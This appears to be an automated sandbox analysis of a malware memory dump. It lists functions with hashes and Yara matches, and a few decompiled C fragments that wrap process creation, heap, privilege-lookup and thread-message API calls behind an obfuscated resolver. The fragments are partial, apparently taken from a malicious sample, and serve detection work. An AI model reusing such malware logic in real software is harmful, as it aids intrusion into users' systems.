                                                    • Opcode ID: 6f8b6829a34d0d24e53c7338691213a7612cec61382ba46894ab394736f9cfc8
                                                    • Instruction ID: a5b7fdfbf5fe604543a6035d0846ead01ef6ebb354cddd2546d43bce3afd04e9
                                                    • Opcode Fuzzy Hash: 6f8b6829a34d0d24e53c7338691213a7612cec61382ba46894ab394736f9cfc8
                                                    • Instruction Fuzzy Hash: 50900261B01004428240716A88449065005BBE1351751C131A0989550EC9998865B6A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 75fa17a14488ca16ddcce2173ddb7a6671609e2dddc6cbed5d49b08f8326cf4f
                                                    • Instruction ID: ec0fc32fd1758fcfc06d114b7a01a9978fd27d36b9ed3de1b09a3d94747e602b
                                                    • Opcode Fuzzy Hash: 75fa17a14488ca16ddcce2173ddb7a6671609e2dddc6cbed5d49b08f8326cf4f
                                                    • Instruction Fuzzy Hash: 8C90027170140802D200615A481470B100597D0342F51C021A1155555ECA658851B5B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: cc20667db144feaae4a959c80f0eed79825d92c6b9dfcb4bee78e398ede9617d
                                                    • Instruction ID: 4dabcd3b7533db0e0301b84eaf12022f3adc0b1b17560bfb968af3897a4dc6bf
                                                    • Opcode Fuzzy Hash: cc20667db144feaae4a959c80f0eed79825d92c6b9dfcb4bee78e398ede9617d
                                                    • Instruction Fuzzy Hash: B790027171114802D210615A8404706100597D1341F51C421A0815558ECAD58891B162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6cedfc1307578da3b9919c04cc85eded077195f47547435950739ae0eab00c03
                                                    • Instruction ID: 84325468cd8d61f69f06fd40c0e515d5296b6df9a57ccb872a40655d4eb8463c
                                                    • Opcode Fuzzy Hash: 6cedfc1307578da3b9919c04cc85eded077195f47547435950739ae0eab00c03
                                                    • Instruction Fuzzy Hash: C990026170100403D240715A54186065005E7E1341F51D021E0405554DDD558856B262
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 65ad7666882c8d6a65adca0cf8aa83097a1f605ddd692decfdb8639539b4f39e
                                                    • Instruction ID: ca98572dbb5bca2050e8513b41c34cdd8552882dd027c8cad3b9dbdb67136c2c
                                                    • Opcode Fuzzy Hash: 65ad7666882c8d6a65adca0cf8aa83097a1f605ddd692decfdb8639539b4f39e
                                                    • Instruction Fuzzy Hash: F290026971300402D280715A540860A100597D1342F91D425A0006558DCD558869B361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 060e5310e39ab54be55905ba40a5f481b07da8e08f55c899d0e91078118bd49e
                                                    • Instruction ID: 03d4135600f890d824602031901dd738e11053023965e03d5ec6fbe1cdc7b215
                                                    • Opcode Fuzzy Hash: 060e5310e39ab54be55905ba40a5f481b07da8e08f55c899d0e91078118bd49e
                                                    • Instruction Fuzzy Hash: EA90027170100802D200659A5408646100597E0341F51D021A5015555FCAA58891B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                    • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                    • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                    • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418970, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42processCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E00418970(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, char _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0x58de852
				_t3 = _t16 + 0xc80; // 0x408929
				_t34 = _t3;
				E004191F0(_t33, _a4, _t34,  *_t2, 0, 0x37);
				_t5 =  &_a48; // 0x407c65
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44,  *_t5, _a52); // executed
				return _t22;
			}






                                                    0x00418973
                                                    0x00418976
                                                    0x00418982
                                                    0x00418982
                                                    0x0041898a
                                                    0x00418992
                                                    0x004189c4
                                                    0x004189c8

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(00407C3D,00407C65,004079FD,00000010,?,00000044,?,?,?,00000044,e|@D,00000010,004079FD,00407C65,00407C3D,00407CA9), ref: 004189C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID: e|@D
                                                    • API String ID: 2186235152-4053762965
                                                    • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                    • Instruction ID: dc55ce413be0313fa40dca0a96025687998fc1323a4b44b9ddea5e3475535afa
                                                    • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                    • Instruction Fuzzy Hash: C701AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004188F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: %mA
                                                    • API String ID: 3298025750-273627637
                                                    • Opcode ID: ef9b155757f3e1fbe39276f7fd5c833905d4bea5a6ec4ef061b902a9c0f44d4d
                                                    • Instruction ID: ff75906eec445189a7608ef16a07370f9ba81c6555a21011093ab971dc24f262
                                                    • Opcode Fuzzy Hash: ef9b155757f3e1fbe39276f7fd5c833905d4bea5a6ec4ef061b902a9c0f44d4d
                                                    • Instruction Fuzzy Hash: 56F0BEB82082856BEB00EF689CC08AB7794BF80318710895EFC4947243D634D95987A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 36%
                                                    			E004188C0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _t10;
				void* _t12;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t12 =  *_t6;
				_push(_a16);
				_push(_a12);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}






                                                    0x004188d7
                                                    0x004188e2
                                                    0x004188e2
                                                    0x004188e8
                                                    0x004188eb
                                                    0x004188ed
                                                    0x004188f1

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: F5A
                                                    • API String ID: 1279760036-683449296
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004188FA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: F5A
                                                    • API String ID: 1279760036-683449296
                                                    • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                    • Instruction ID: 25b7ab50de32ca0460f32ce6d2cc7201fc87e64a3a46fad92a8330604ac2ee33
                                                    • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                    • Instruction Fuzzy Hash: B6A022B3B20088000020B3F23C083EAE20C80C33BB2200CEFC00C30003888BC088322E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E00407290(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E00409B50(__ebx, __edi, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_t25, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E004092B0(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                    0x00407290
                                                    0x0040729f
                                                    0x004072a3
                                                    0x004072ae
                                                    0x004072ba
                                                    0x004072be
                                                    0x004072ce
                                                    0x004072d3
                                                    0x004072da
                                                    0x004072dc
                                                    0x004072dd
                                                    0x004072ea
                                                    0x004072ec
                                                    0x004072ee
                                                    0x0040730b
                                                    0x0040730b
                                                    0x00000000
                                                    0x0040730d
                                                    0x00407312

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                    • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                    • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                    • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 30%
                                                    			E00418900(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
				char _t15;
				void* _t22;

				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
				E004191F0(_t22);
				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}





                                                    0x00418905
                                                    0x00418914
                                                    0x00418917
                                                    0x0041892d
                                                    0x00418931

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x00418a7a
                                                    0x00418a90
                                                    0x00418a94

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                    0x00418943
                                                    0x0041895a
                                                    0x00418968

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F5967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 1527c710c1e0e2c83c67bf8fb86e93aa41cb4e5c46ac5ee222a6d8163aee5256
                                                    • Instruction ID: ba833e51994be8ccf52532ac0b01eb9847a0628f2f7d48cea821d77d8d67efdd
                                                    • Opcode Fuzzy Hash: 1527c710c1e0e2c83c67bf8fb86e93aa41cb4e5c46ac5ee222a6d8163aee5256
                                                    • Instruction Fuzzy Hash: 50B09B71D054C5C5D715D7614608717794077D0751F17C061D2020641B4778C495F5B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00FCB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • The resource is owned exclusively by thread %p, xrefs: 00FCB374
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00FCB314
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FCB3D6
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 00FCB48F
                                                    • a NULL pointer, xrefs: 00FCB4E0
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00FCB484
                                                    • write to, xrefs: 00FCB4A6
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00FCB53F
                                                    • <unknown>, xrefs: 00FCB27E, 00FCB2D1, 00FCB350, 00FCB399, 00FCB417, 00FCB48E
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 00FCB352
                                                    • read from, xrefs: 00FCB4AD, 00FCB4B2
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00FCB323
                                                    • *** Inpage error in %ws:%s, xrefs: 00FCB418
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FCB38F
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00FCB305
                                                    • This failed because of error %Ix., xrefs: 00FCB446
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00FCB39B
                                                    • *** then kb to get the faulting stack, xrefs: 00FCB51C
                                                    • *** enter .cxr %p for the context, xrefs: 00FCB50D
                                                    • The instruction at %p referenced memory at %p., xrefs: 00FCB432
                                                    • The instruction at %p tried to %s , xrefs: 00FCB4B6
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00FCB2DC
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00FCB47D
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00FCB2F3
                                                    • Go determine why that thread has not released the critical section., xrefs: 00FCB3C5
                                                    • *** enter .exr %p for the exception record, xrefs: 00FCB4F1
                                                    • The resource is owned shared by %d threads, xrefs: 00FCB37E
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00FCB476
                                                    • an invalid address, %p, xrefs: 00FCB4CF
                                                    • The critical section is owned by thread %p., xrefs: 00FCB3B9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: 245a32bc8c4489b0ceeab4d39d1b662c525f860205e0e4c31fad508f118723ec
                                                    • Instruction ID: cfc5e7bd4d3cb1cd31946c2027cb3302bd7362aeb012681d1528204bf7372d1c
                                                    • Opcode Fuzzy Hash: 245a32bc8c4489b0ceeab4d39d1b662c525f860205e0e4c31fad508f118723ec
                                                    • Instruction Fuzzy Hash: EE81E1B9A40211FFDB29AE458D47F7F3B26AF46B61F454048F4042B193E365C851FAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FD1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 0ea75f4086b2fe9dbf43766bbdf153364322b76b14daa17c7d47bff9d0a819dc
                                                    • Instruction ID: 9fdbeec20b39a7441a1f9fd753a38adca8aa3e00551d3ffae41411836a61df4a
                                                    • Opcode Fuzzy Hash: 0ea75f4086b2fe9dbf43766bbdf153364322b76b14daa17c7d47bff9d0a819dc
                                                    • Instruction Fuzzy Hash: C0619337A65148FFD3119744E855A7173A6F704B30B1D846BF8097B392C7299C80BF0A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F23D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Kernel-MUI-Number-Allowed, xrefs: 00F23D8C
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00F23DC0
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00F23E97
                                                    • WindowsExcludedProcs, xrefs: 00F23D6F
                                                    • Kernel-MUI-Language-SKU, xrefs: 00F23F70
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: 556bb974310fbde98b618669a1ff8b21542c3b975d1739de5764262843b11b35
                                                    • Instruction ID: 3a0b2f4843530aab9b9e7ff2c804b63564518bd42e251d16d80dee3018f2d8ca
                                                    • Opcode Fuzzy Hash: 556bb974310fbde98b618669a1ff8b21542c3b975d1739de5764262843b11b35
                                                    • Instruction Fuzzy Hash: 69F1A1B2D00628EFCB11DF98D981AEEBBB9FF48750F14006AE905E7251D7749E05EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F12D8A, Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting$RegLoadRegistryInfo
                                                    • API String ID: 0-3584235622
                                                    • Opcode ID: 4d9ded31138b85d91d586bd95360f0537a7e08ba4d07420340ebe0f426a933e3
                                                    • Instruction ID: 230132cb03707dc29e397adc468d5f3953631a33d8de13c998b87937c80c5fb3
                                                    • Opcode Fuzzy Hash: 4d9ded31138b85d91d586bd95360f0537a7e08ba4d07420340ebe0f426a933e3
                                                    • Instruction Fuzzy Hash: 6D615331E006049FDB32DFA8E880BBE77A1EB40330F240279E855972C1C7389D85B781
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F34120, Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegLoadRegistryInfo
                                                    • API String ID: 0-282410176
                                                    • Opcode ID: fe44051aa3a2dfad77b44901159923bef983a584f279ed4ffc9b7451458994e4
                                                    • Instruction ID: 41ecab7f55eefd9f2253da5f99df06d00edfc5a958edb3376a846a4154afc031
                                                    • Opcode Fuzzy Hash: fe44051aa3a2dfad77b44901159923bef983a584f279ed4ffc9b7451458994e4
                                                    • Instruction Fuzzy Hash: 55F181719083118BC724CF59C481A3AB7E1FF98724F54896EF88ACB251E734EC95EB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F1B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: 73aacb698fea24605ae30dbcf4b3cb5b21652ae5b423bc2042530914373453be
                                                    • Instruction ID: 89310a71a086947d7584e365d76e246ad4e0fa8aa6e731aa2b5ba4af72128f25
                                                    • Opcode Fuzzy Hash: 73aacb698fea24605ae30dbcf4b3cb5b21652ae5b423bc2042530914373453be
